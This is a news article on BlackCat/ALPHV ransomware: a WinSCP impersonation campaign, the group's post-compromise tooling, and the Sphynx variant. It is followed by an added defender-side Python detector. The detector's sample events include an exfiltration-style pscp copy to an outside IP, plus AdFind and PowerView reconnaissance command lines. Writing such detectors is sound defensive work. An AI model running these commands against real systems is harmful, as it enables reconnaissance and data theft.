BlackCat ransomware is among the most active threats worldwide

July 26, 2023
BlackCat Ransomware Cyber threat Worldwide Malware

New research revealed that the BlackCat ransomware group upgraded its TTPs earlier this year to deploy more efficient attacks against targeted entities. Moreover, BlackCat, also known as the ALPHV group, is among the top 10 most active ransomware groups worldwide today.

The group also has an appalling record of stealing sensitive medical and financial data from numerous firms. Currently, the group continues to infect more organisations globally.


The BlackCat ransomware impersonates an app to propagate.


According to investigations, the BlackCat ransomware group has been impersonating the website of WinSCP, a popular and well-known Windows file transfer application, to infect its targets.

In addition, the new campaign spreads the fake website through search engines such as Bing and Google. The look-alike site acts as bait to compromise the computers of system admins, IT professionals, and web admins, and the attack also seeks to acquire admin-level privileges in the process.

Once the attack is successful, it allows the threat actors to establish persistence, steal passwords, and access backup servers.

The BlackCat operators also used several tools in the later stages of their attacks. Based on reports, the ransomware group uses PowerShell commands, AdFind, PuTTY Secure Copy, Findstr, and PowerView to query Active Directory, collect user information, extract ZIP files, move laterally, and bypass antimalware solutions.

Furthermore, the BlackCat actors could also use the SpyBoy Terminator alongside the tools mentioned above. This malicious tool can terminate several Windows security products through a bring-your-own-vulnerable-driver (BYOVD) mechanism.
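As an added, defender-side example that is not part of the original article: a small detector that scans process-creation events for the tools named above (AdFind, PuTTY Secure Copy, findstr, PowerView) and alerts per host only when several distinct tools run within a short window. The event format and the sample events are constructed for this example, not taken from any real product or incident.

```python
# Added example, not from the article: scan constructed process-creation events for the
# tooling the article names (AdFind, PuTTY Secure Copy, findstr, PowerView) and alert per
# host only when several distinct tools run within a short window, because each one alone
# (findstr especially) is also used legitimately.
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed event shape (hypothetical, not a real product schema): one JSON object per
# line with host, ISO-8601 time, image path and command line.
TOOL_SIGNATURES = {"adfind.exe": "AdFind", "pscp.exe": "PuTTY Secure Copy",
                   "findstr.exe": "findstr"}
# PowerView is a PowerShell module, so match on a few of its cmdlet names instead.
POWERVIEW_CMDLETS = ("get-netuser", "get-netcomputer", "get-netdomain", "invoke-userhunter")

def classify(event):
    """Return the tool name an event matches, or None."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if image in TOOL_SIGNATURES:
        return TOOL_SIGNATURES[image]
    cmd = event["cmdline"].lower()
    if image in ("powershell.exe", "pwsh.exe") and any(c in cmd for c in POWERVIEW_CMDLETS):
        return "PowerView"
    return None

def scan(lines, window=timedelta(minutes=30), min_tools=2):
    """Return {host: [tools]} for hosts running >= min_tools distinct tools within window."""
    hits = defaultdict(list)
    for line in lines:
        event = json.loads(line)
        tool = classify(event)
        if tool:
            hits[event["host"]].append((datetime.fromisoformat(event["time"]), tool))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()  # chronological, so every later event is at or after t0
        for i, (t0, _) in enumerate(seen):
            tools = {name for t, name in seen[i:] if t - t0 <= window}
            if len(tools) >= min_tools:
                alerts[host] = sorted(tools)
                break
    return alerts

SAMPLE_EVENTS = [  # constructed sample data, not real telemetry
    r'{"host":"WS01","time":"2023-07-20T10:00:00","image":"C:\\Tools\\AdFind.exe","cmdline":"AdFind.exe -f objectcategory=computer"}',
    r'{"host":"WS01","time":"2023-07-20T10:05:00","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe Get-NetUser"}',
    r'{"host":"WS01","time":"2023-07-20T10:20:00","image":"C:\\Tools\\pscp.exe","cmdline":"pscp.exe -r C:\\share user@203.0.113.10:/in/"}',
    r'{"host":"WS02","time":"2023-07-20T11:00:00","image":"C:\\Windows\\System32\\findstr.exe","cmdline":"findstr /i error app.log"}',
]
```

Running `scan(SAMPLE_EVENTS)` flags WS01 (three tools in 20 minutes) and stays quiet on WS02, where a lone findstr call is ordinary admin activity.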

The BlackCat ransomware group has developed a new malware variant called Sphynx. The new variant prioritises speed and stealth so that it can complete its tasks while avoiding security detection. Earlier this year, this notorious ransomware group added a new extortion tactic to its arsenal: it cloned a victim's website and posted the stolen information on the copy.

Cybersecurity experts explained that organisations should prevent unauthorised access to their systems and improve the efficiency of their detection and response processes. Lastly, immediate remediation is crucial for every organisation, since threat actors can exploit any delay in response time.
